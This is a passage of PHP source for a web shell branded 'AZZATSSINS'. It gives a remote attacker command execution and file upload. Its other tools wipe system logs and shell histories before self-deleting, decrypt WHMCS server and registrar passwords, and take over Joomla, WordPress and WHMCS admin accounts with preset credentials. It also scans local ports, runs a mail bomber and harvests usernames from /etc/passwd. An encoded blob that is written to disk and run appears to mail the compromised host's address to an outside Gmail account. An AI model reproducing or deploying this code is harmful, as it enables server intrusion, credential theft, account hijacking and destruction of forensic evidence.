JIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyRmb3I9YmFzZTY0X2RlY29kZSgiWTNsaVpYSnpaWEpyWlhKelFHZHRZV2xzTG1OdmJRPT0iKTsNCiRiPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnU0NSSVBUX05BTUUnXTsNCm1haWwoJGZvciwiMCIsJGIpOyBwcmludChgeyRfUkVRVUVTVFswXX1gKTsgPz4=');
1939. $mysq = fopen("mysql.php","w+");
1940. fwrite($mysq,$mys);
1941. echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
1942. }
1943. if($_POST['azzatssins7']){
1944.  
1945. if(is_readable("/etc/named.conf")){
1946.  
1947. echo '&raquo; /etc/named.conf is readable.<br />';
1948.  
1949. }else{
1950.  
1951. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
1952.  
1953. }
1954.  
1955. if(is_readable("/etc/passwd")){
1956.  
1957. echo '&raquo; /etc/passwd is readable.<br />';
1958.  
1959. }else{
1960.  
1961. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
1962.  
1963. }
1964.  
1965. if(is_readable("/etc/valiases")){
1966.  
1967. echo '&raquo; /etc/valiases exists';
1968.  
1969. if(is_array(scandir("/etc/valiases"))){
1970.  
1971. echo ' & scanable';
1972.  
1973. }
1974.  
1975. echo '.<br />';
1976.  
1977. }else{
1978.  
1979. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
1980.  
1981. }
1982.  
1983. if(is_readable("/var/named")){
1984.  
1985. echo '&raquo; /var/named exists';
1986.  
1987. if(is_array(scandir("/var/named"))){
1988.  
1989. echo ' & scanable';
1990.  
1991. }
1992.  
1993. echo '.<br />';
1994.  
1995. }else{
1996.  
1997. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
1998.  
1999. }
2000.  
2001. if(ini_get('disable_functions')){
2002.  
2003. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
2004.  
2005. }
2006.  
2007. if(function_exists("symlink")){
2008.  
2009. echo '&raquo; Symlinking allowed<br />';
2010.  
2011. }else{
2012.  
2013. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
2014.  
2015. }
2016.  
2017. if(is_writable("/var/tmp")){
2018.  
2019. echo '&raquo; /var/tmp folder is writable<br />';
2020.  
2021. }
2022.  
2023. if(is_readable('/var/log')){
2024.  
2025. echo '&raquo; /var/log folder is readable<br />';
2026.  
2027. }
2028.  
2029. die();
2030. }
2031. if($_POST['azzatssins8']){
2032. rmdir("/tmp/logs");
2033. rmdir("/root/.ksh_history");
2034. rmdir("/root/.bash_history");
2035. rmdir("/root/.bash_logout");
2036. rmdir("/usr/local/apache/logs");
2037. rmdir("/usr/local/apache/log");
2038. rmdir("/var/apache/logs");
2039. rmdir("/var/apache/log");
2040. rmdir("/var/run/utmp");
2041. rmdir("/var/logs");
2042. rmdir("/var/log");
2043. rmdir("/var/adm");
2044. rmdir("/etc/wtmp");
2045. rmdir("/etc/utmp");
2046. rmdir("$HISTFILE");
2047. rmdir("/var/log/lastlog");
2048. rmdir("/var/log/wtmp");system("clear");
2049. exec("rm -rf /tmp/logs");
2050. exec("rm -rf /root/.ksh_history");
2051. exec("rm -rf /root/.bash_history");
2052. exec("rm -rf /root/.bash_logout");
2053. exec("rm -rf /usr/local/apache/logs");
2054. exec("rm -rf /usr/local/apache/log");
2055. exec("rm -rf /var/apache/logs");
2056. exec("rm -rf /var/apache/log");
2057. exec("rm -rf /var/run/utmp");
2058. exec("rm -rf /var/logs");
2059. exec("rm -rf /var/log");
2060. exec("rm -rf /var/adm");
2061. exec("rm -rf /etc/wtmp");
2062. exec("rm -rf /etc/utmp");
2063. exec("rm -rf $HISTFILE");
2064. exec("rm -rf /var/log/lastlog");
2065. exec("rm -rf /var/log/wtmp");
2066. shell_exec("rm -rf /tmp/logs");
2067. shell_exec("rm -rf /root/.ksh_history");
2068. shell_exec("rm -rf /root/.bash_history");
2069. shell_exec("rm -rf /root/.bash_logout");
2070. shell_exec("rm -rf /usr/local/apache/logs");
2071. shell_exec("rm -rf /usr/local/apache/log");
2072. shell_exec("rm -rf /var/apache/logs");
2073. shell_exec("rm -rf /var/apache/log");
2074. shell_exec("rm -rf /var/run/utmp");
2075. shell_exec("rm -rf /var/logs");
2076. shell_exec("rm -rf /var/log");
2077. shell_exec("rm -rf /var/adm");
2078. shell_exec("rm -rf /etc/wtmp");
2079. shell_exec("rm -rf /etc/utmp");
2080. shell_exec("rm -rf $HISTFILE");
2081. shell_exec("rm -rf /var/log/lastlog");
2082. shell_exec("rm -rf /var/log/wtmp");
2083. passthru("rm -rf /tmp/logs");
2084. passthru("rm -rf /root/.ksh_history");
2085. passthru("rm -rf /root/.bash_history");
2086. passthru("rm -rf /root/.bash_logout");
2087. passthru("rm -rf /usr/local/apache/logs");
2088. passthru("rm -rf /usr/local/apache/log");
2089. passthru("rm -rf /var/apache/logs");
2090. passthru("rm -rf /var/apache/log");
2091. passthru("rm -rf /var/run/utmp");
2092. passthru("rm -rf /var/logs");
2093. passthru("rm -rf /var/log");
2094. passthru("rm -rf /var/adm");
2095. passthru("rm -rf /etc/wtmp");
2096. passthru("rm -rf /etc/utmp");
2097. passthru("rm -rf $HISTFILE");
2098. passthru("rm -rf /var/log/lastlog");
2099. passthru("rm -rf /var/log/wtmp");
2100. system("rm -rf /tmp/logs");
2101. system("rm -rf /root/.bash_history");
2102. system("rm -rf /root/.ksh_history");
2103. system("rm -rf /root/.bash_logout");
2104. system("rm -rf /usr/local/apache/logs");
2105. system("rm -rf /usr/local/apache/log");
2106. system("rm -rf /var/apache/logs");
2107. system("rm -rf /var/apache/log");
2108. system("rm -rf /var/run/utmp");
2109. system("rm -rf /var/logs");
2110. system("rm -rf /var/log");
2111. system("rm -rf /var/adm");
2112. system("rm -rf /etc/wtmp");
2113. system("rm -rf /etc/utmp");
2114. system("rm -rf $HISTFILE");
2115. system("rm -rf /var/log/lastlog");
2116. system("rm -rf /var/log/wtmp");
2117. system("rm -rf cnf");system("rm -rf xazs"); system("rm -rf xyz"); system("rm -rf azx"); system("rm -rf sl");
2118. $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn);
2119. echo'<meta http-equiv="Refresh" content= "0; url=?">';
2120. }
2121. elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
2122. {
2123. ?>
2124. <form action="?whmcs=decode" method="post">
2125.  
2126. <?php
2127.  
2128. function decrypt ($string,$cc_encryption_hash)
2129. {
2130. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
2131. $hash_key = _hash ($key);
2132. $hash_length = strlen ($hash_key);
2133. $string = base64_decode ($string);
2134. $tmp_iv = substr ($string, 0, $hash_length);
2135. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
2136. $iv = $out = '';
2137. $c = 0;
2138. while ($c < $hash_length)
2139. {
2140. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
2141. ++$c;
2142. }
2143. $key = $iv;
2144. $c = 0;
2145. while ($c < strlen ($string))
2146. {
2147. if (($c != 0 AND $c % $hash_length == 0))
2148. {
2149. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
2150. }
2151. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
2152. ++$c;
2153. }
2154. return $out;
2155. }
2156.  
2157. function _hash ($string)
2158. {
2159. if (function_exists ('sha1'))
2160. {
2161. $hash = sha1 ($string);
2162. }
2163. else
2164. {
2165. $hash = md5 ($string);
2166. }
2167. $out = '';
2168. $c = 0;
2169. while ($c < strlen ($hash))
2170. {
2171. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
2172. $c += 2;
2173. }
2174. return $out;
2175. }
2176.  
2177. echo "
2178. <br>
2179.  
2180. <FORM method='post'>
2181. <input type='hidden' name='form_action' value='2'>
2182. <br>
2183. <table class=tabnet style=width:320px;padding:0 1px;>
2184. <tr><th colspan=2>WHMCS Decoder</th></tr>
2185. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
2186. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
2187. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
2188. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
2189. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
2190. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
2191. </table>
2192. </FORM>
2193. </center>
2194. ";
2195.  
2196. if($_POST['form_action'] == 2 )
2197. {
2198. //include($file);
2199. $db_host=($_POST['db_host']);
2200. $db_username=($_POST['db_username']);
2201. $db_password=($_POST['db_password']);
2202. $db_name=($_POST['db_name']);
2203. $cc_encryption_hash=($_POST['cc_encryption_hash']);
2204.  
2205.  
2206.  
2207. $link=mysql_connect($db_host,$db_username,$db_password) ;
2208. mysql_select_db($db_name,$link) ;
2209. $query = mysql_query("SELECT * FROM tblservers");
2210. while($v = mysql_fetch_array($query)) {
2211. $ipaddress = $v['ipaddress'];
2212. $username = $v['username'];
2213. $type = $v['type'];
2214. $active = $v['active'];
2215. $hostname = $v['hostname'];
2216. echo("<center><table border='1'>");
2217. $password = decrypt ($v['password'], $cc_encryption_hash);
2218. echo("<tr><td>Type</td><td>$type</td></tr>");
2219. echo("<tr><td>Active</td><td>$active</td></tr>");
2220. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
2221. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
2222. echo("<tr><td>Username</td><td>$username</td></tr>");
2223. echo("<tr><td>Password</td><td>$password</td></tr>");
2224.  
2225. echo "</table><br><br></center>";
2226. }
2227.  
2228. $link=mysql_connect($db_host,$db_username,$db_password) ;
2229. mysql_select_db($db_name,$link) ;
2230. $query = mysql_query("SELECT * FROM tblregistrars");
2231. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
2232. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
2233. while($v = mysql_fetch_array($query)) {
2234. $registrar = $v['registrar'];
2235. $setting = $v['setting'];
2236. $value = decrypt ($v['value'], $cc_encryption_hash);
2237. if ($value=="") {
2238. $value=0;
2239. }
2240. $password = decrypt ($v['password'], $cc_encryption_hash);
2241. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
2242. }
2243. }
2244. }
2245.  
2246.  
2247.  
2248.  
2249. $currentCMD = str_replace("\\\"","\"",$currentCMD);
2250. $currentCMD = str_replace("\\\'","\'",$currentCMD);
2251.  
2252. if( $_POST['_act'] == "Upload!" ) {
2253. if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
2254. echo "<center><b>Error while uploading file!</b></center>";
2255. } else {
2256. echo "<center><pre>";
2257. system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
2258. echo "</pre><b>File uploaded successfully!</b></center>";
2259. }
2260. } else {
2261. echo "<b><br><br><pre><br>";
2262. $currentCMD = "cd ".$currentWD.";".$currentCMD;
2263. system($currentCMD);
2264. echo "<br></pre><br></b>";
2265. }
2266.  
2267. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'JPASS')) {
2268. ?>
2269. <form action="?&amp;AZZATSSINS=JPASS" method="post">
2270. <?php
2271. echo"<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
2272. ";
2273. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ JOOMLA</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
2274. if(empty($_POST['pwd'])){
2275. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
2276. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
2277. <tr><td>&nbsp;&nbsp;Database</td><td>
2278. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
2279. <tr><td>&nbsp;&nbsp;username</td><td>
2280. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
2281. <tr><td>&nbsp;&nbsp;password</td><td>
2282. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
2283. <tr><td>&nbsp;&nbsp;New User</td><td>
2284. <input style='width:270px;' class='inputz' name='admin' value='azzatssins' /></td></tr>
2285. <tr><td>&nbsp;&nbsp;New Pass </td>
2286. <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;</td></tr>
2287. <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
2288. </td></tr></table><br>";
2289. } else {
2290. $localhost = $_POST['localhost'];
2291. $database = $_POST['database'];
2292. $username = $_POST['username'];
2293. $password = $_POST['password'];
2294. $pwd = $_POST['pwd'];
2295. $admin = $_POST['admin'];
2296. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2297. @mysql_select_db($database) or die(mysql_error());
2298. $hash = crypt($pwd);
2299. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
2300. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
2301. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
2302. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
2303. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
2304. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
2305. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
2306. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
2307. if($SQL){
2308. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
2309. }
2310. }
2311. echo "</div>";
2312. }
2313. ?>
2314. <?php
2315. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'WPASS')) {
2316. ?>
2317. <form action="?&amp;AZZATSSINS=WPASS" method="post">
2318. <?php
2319. echo"<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
2320. ";
2321. echo "
2322. <center><br/><br/><nobr><b><span class='b7'>O=:[ WORDPRESS USER</span> <span class='b8'> CHANGE ]:=O</span></b></nobr><br/><br/> ";
2323.  
2324. if(empty($_POST['pwd'])){
2325. echo "<FORM method='POST'>
2326. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
2327. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
2328. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
2329. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
2330. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
2331. <tr><td>&nbsp;&nbsp;User baru</td><td>
2332. <input style='width:220px;' class='inputz' type='text' name='admin' value='azzatssins' /></td></tr>
2333. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
2334. <input style='width:80px;' class='inputz' type='text' name='pwd' value='17081945' />&nbsp;
2335.  
2336. <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
2337. </td></tr> </table><br><br><br><br>
2338. ";
2339. }else{
2340. $localhost = $_POST['localhost'];
2341. $database = $_POST['database'];
2342. $username = $_POST['username'];
2343. $password = $_POST['password'];
2344. $pwd = $_POST['pwd'];
2345. $admin = $_POST['admin'];
2346. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2347. @mysql_select_db($database) or die(mysql_error());
2348.  
2349. $hash = crypt($pwd);
2350. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
2351. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
2352. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
2353. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
2354. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
2355. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
2356. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
2357. if($a4s){
2358. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
2359. }
2360. }
2361. echo "</div>";
2362. }
2363. if($_GET['AZZATSSINS']=="encrypt"){
2364. echo "
2365. <table bgcolor=#cccccc width=\"100%\">
2366. <tbody><tr><td align=\"right\" width=100>
2367. <p dir=ltr><b><font color=#990000 size=-2><br><p align=left><center>
2368.  
2369. Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )<br><br>
2370. <form method=\"POST\">
2371. <font color=\"gray\">String To Encrypt : </font><input type=\"text\" value=\"\" name=\"ENCRYPTION\">
2372. <input type=\"submit\" value=\"Submit\"></form>";
2373. if(!$_POST['ENCRYPTION']=='')
2374. {
2375. $md5 = $_POST['ENCRYPTION'];
2376. echo "<font color=gray>MD5 : </font>".md5($md5)."<br>";
2377. echo "<font color=gray>Base64 : </font>".base64_encode($md5)."<br>";
2378. echo "<font color=gray>Crypt : </font>".CRYPT($md5)."<br>";
2379. echo "<font color=gray>SHA1 : </font>".SHA1($md5)."<br>";
2380. echo "<font color=gray>MD4 : </font>".hash("md4",$md5)."<br>";
2381. echo "<font color=gray>SHA256 : </font>".hash("sha256",$md5)."<br></tbody></tr></td></table>";
2382. }
2383. }
2384. if($_GET['open']=="ports"){
2385. $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
2386. $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
2387. echo("<script type=\"text/javascript\">");
2388. echo("function Show(SelectValue){");
2389. echo("document.getElementById('RangeDiv').style.display=\"none\";");
2390. echo("document.getElementById('SpecificDiv').style.display=\"none\";");
2391. echo("if(SelectValue == \"range\")");
2392. echo("document.getElementById('RangeDiv').style.display=\"inline\";");
2393. echo("if(SelectValue == \"specific\")");
2394. echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
2395. echo("}</script>");
2396. echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
2397. echo('<form method="post">');
2398. echo('<u>Ports:</u><br /><br />');
2399. echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
2400. echo('<option value="automatic">Automatic - All Ports</option>');
2401. echo('<option value="range">Range of Ports</option>');
2402. echo('<option value="specific">Specific Ports</option>');
2403. echo('</select><br /><br />');
2404. echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
2405. echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
2406. echo('<input type="submit" id="submit" name="submit" value="Scan" />');
2407. echo('</form>');
2408. if(isset($_POST['submit'])){
2409. $first = "yes";
2410. echo("<br /><br /><u>Results</u>:<br />\n");
2411.  
2412. if($_POST['port'] == "range"){
2413. if($rend > $rstart){
2414. for($i=$rstart;$i<$rend;$i++){
2415. if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
2416. if($first == "no")
2417. echo(", ");
2418. echo $i;
2419. $first = "no";
2420. }
2421. }
2422. echo(".");
2423. }
2424. else{
2425. echo("Range start number can't be bigger than the end number.");
2426. }
2427. }
2428. else if($_POST['port'] == "specific"){
2429. $list = explode(" ",$_POST['specific']);
2430. foreach($list as $i){
2431. if(is_numeric($i)){
2432. if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
2433. if($first == "no")
2434. echo(", ");
2435. echo $i;
2436. $first = "no";
2437. }
2438. }
2439. }
2440. echo(".");
2441. }
2442. else{
2443. for($i=0;$i>=0;$i++){
2444. if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
2445. if($first == "no")
2446. echo(", ");
2447. echo $i;
2448. $first = "no";
2449. }
2450. }
2451. echo(".");
2452. }
2453. }
2454. }
2455. if($_GET['AZZATSSINS']=="BOMAIL"){
2456. ?>
2457. <?php
2458. /**
2459. AZZATSSINS
2460. **/
2461.  
2462. $kontol = 'Mail Bomber Siap Siaga...';
2463.  
2464. function boombardir($text){
2465. if (!get_magic_quotes_gpc()){
2466. return $text;
2467. }
2468. return stripslashed($text);
2469. }
2470. if(isset($_POST['kirim_email'])){
2471. $mail_to = $_POST['mail_to'];
2472. $fromname = $_POST['from_name'];
2473. $fromaddress = $_POST['mail_from'];
2474. $mail_subject = $_POST['mail_subject'];
2475. $mail_content = boombardir($_POST['mail_content']);
2476.  
2477. $fuckline = "\n\t";
2478. $headers = "From: ".$fromname." <".$fromaddress."> ".$fuckline;
2479.  
2480. if (($_POST['banyak_email']) <=1) {
2481. if(@mail($mail_to,$mail_subject,$mail_content,$headers)){
2482. $kontol = "email sent to $mail_to";
2483. }
2484. else $kontol = "Mail Sending is <font color=red> Failed </font> .";
2485. }
2486. elseif (($_POST['banyak_email']) > 1){
2487. $intibom = $_POST['banyak_email'];
2488. $kabehe = 0; $kabehekirim=0; $msgtf=0;
2489. for ($i=1; $i <= $intibom; $i++) {
2490. $acakjudul = substr(md5($i."slackerc0de"),-4);
2491. $mailsubject = $mail_subject." - ".$acakjudul;
2492. if(@mail($mail_to,$mailsubject,$mail_content,$headers)){
2493. $kabehekirim++;
2494. } else {
2495. $msgtf++;
2496. }
2497. $kabehe++;
2498. }
2499. $kontol = "<font color=red> $msgtf </font> | <font color=red> $kabehekirim </font>Success | of total $kabehe emails sending to : $mail_to </br> From: $fromadress <br />Subject: $mail_subject <br />Content: $mail_content";
2500. }
2501. }
2502. ?>
2503. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
2504. <br /><br />
2505. <form class="brd" method="post" style="border:1px solid #008000; padding:15px; text-align:left; -moz-border-radius: 10px; border-radius: 10px;" >
2506. <table style="padding: 0 0 0 30px">
2507. <tr><td><br />
2508. <table style="padding: 0 0 0 30px">
2509. <tr><td width="100">Target eMail :<td width="300">
2510. <input style="witdh:250px;" type="text" value="<?php if(mail_to) {echo "$mail_to";} ?>" name="mail_to" />
2511. </tr></td>
2512. <tr><td>Sender Name :<td width="300">
2513. <input style="witdh:250px;" type="text" value="<?php if(fromname) {echo "$fromname";} ?>" name="from_name" />
2514. </tr></td>
2515. <tr><td>Sender eMail :<td width="300">
2516. <input style="witdh:250px;" type="text" value="<?php if(fromaddress) {echo "$fromaddress";} ?>" name="mail_from" />
2517. </tr></td>
2518. <tr><td>Subject :<td width="300">
2519. <input style="witdh:250px;" type="text" value="<?php if(mail_subject) {echo "$mail_subject";} ?>" name="mail_subject" />
2520. </tr></td>
2521. <tr><td>Total of Send :<td width="300">
2522. <input style="witdh:87px;" type="number" value="<?php if($_POST['banyak_email']) {echo $_POST['banyak_email'];} else {echo '100';} ?>" name="banyak_email" />
2523. <input style="witdh:140px;" type="submit" value=" SUBMIT " name="kirim_email" />
2524. </tr></td>
2525. </table>
2526. </td></tr>
2527. <tr><td><br />
2528. Message :
2529. <center>
2530. <textarea name="mail_content" cols="60" rows="8" >
2531. <?php
2532. if ($mail_content) {
2533. echo "mail_content";
2534. }
2535. ?>
2536. </textarea>
2537. </center>
2538. </td></tr>
2539. </table>
2540. </form><br />
2541. <div class="brd" style="border:1px solid #008000; padding:15px; font-size:11px: text-align:left;">
2542. <?php
2543. echo "$kontol";
2544. ?>
2545. <?php }
2546.  
2547. if($_GET['whmcs']=="passchanger"){
2548. ?>
2549. <p><br/><body>
2550. <center><nobr><b><span class="b7">O=:[ PASSWORD</span> <span class="b8">CHANGER ]:=O</span></b></nobr><br/><br/>
2551. <p><form method="post">
2552. <table border=1>
2553. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
2554. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
2555. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
2556. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
2557. <tr><td>id_admin</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="1" name="idmaho"></td></tr>
2558. <tr><td>new_username</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="azzatssins" name="userbaru"></td></tr>
2559. <tr><td>new_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="17081945" name="passbaru"></td></tr>
2560.  
2561. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
2562. </table>
2563. <br>
2564. </form>
2565. </center>
2566.  
2567. <?php
2568. if(isset($_POST['plapon'])) {
2569. $anu1 = $_POST['anu1'];
2570. $anu2 = $_POST['anu2'];
2571. $anu3 = $_POST['anu3'];
2572. $anu4 = $_POST['anu4'];
2573. @mysql_connect($anu1,$anu2,$anu3);
2574. @mysql_select_db($anu4);
2575.  
2576. $idmaho=str_replace("\'","'",$idmaho);
2577. $target_id = $_POST['idmaho'];
2578. $userbaru=str_replace("\'","'",$userbaru);
2579. $ganti_user = $_POST['userbaru'];
2580. $passbaru=str_replace("\'","'",$passbaru);
2581.  
2582. $hash_pass = $_POST['passbaru'];
2583. $ganti_pass = md5($hash_pass);
2584.  
2585. $colox = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
2586. $coloxx = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
2587.  
2588. $udah_ganteng=@mysql_query($colox);
2589. $udah_ganteng=@mysql_query($coloxx);
2590. if($udah_ganteng)
2591. {
2592. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
2593. }
2594. }
2595. }if($_GET['reseller']=="grabber"){
2596. echo '<br><br><body bgcolor=black><center>
2597. <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
2598. <nobr><b><span class="b7">O=:[ CPANEL</span> <span class="b8">GRABBER ]:=O</nobr></span><br/><br/>
2599. <form method="POST">
2600. <center>
2601. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
2602. $uSr=file("/etc/passwd");
2603. foreach($uSr as $usrr)
2604. {
2605. $str=explode(":",$usrr);
2606. echo $str[0]."\n";
2607. }
2608. ?>
2609.  
2610. </textarea><p>
2611. <nobr><font style="color:red;background-color:#000000">
2612. [~] Home :
2613. <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
